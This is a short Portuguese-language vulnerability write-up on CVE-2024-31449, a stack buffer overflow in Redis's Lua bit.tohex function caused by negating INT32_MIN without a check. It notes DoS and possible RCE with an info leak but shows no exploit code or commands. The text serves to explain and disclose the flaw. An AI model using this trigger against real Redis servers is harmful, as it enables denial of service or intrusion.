CVE-2024-31449

Redis é um banco de dados não relacional em memória de código aberto.

Resumo

  • Vulnerabilidade de estouro de buffer de pilha presente em todas as versões do Redis que incluem o motor Lua.
  • Relacionada à função bit.tohex dentro do motor Lua (o módulo bit é usado para realizar operações bit a bit).

A função bit.tohex internamente, quando recebe um número negativo, multiplica por -1 para torná-lo positivo. O valor INT32_MIN também é multiplicado por negativo sem verificação, resultando em um valor extremamente grande internamente, e então a lógica prossegue, causando um estouro de buffer de pilha.

Como o binário do servidor Redis possui quase todas as técnicas de proteção ativadas, sozinho é difícil obter RCE, mas é possível causar DoS com o estouro de buffer de pilha.

Pode-se ver que ocorreu um crash.

Conclusão

Através desta vulnerabilidade, no mínimo é possível DoS; se acompanhada de vazamento de informações (info leak), é possível até RCE.
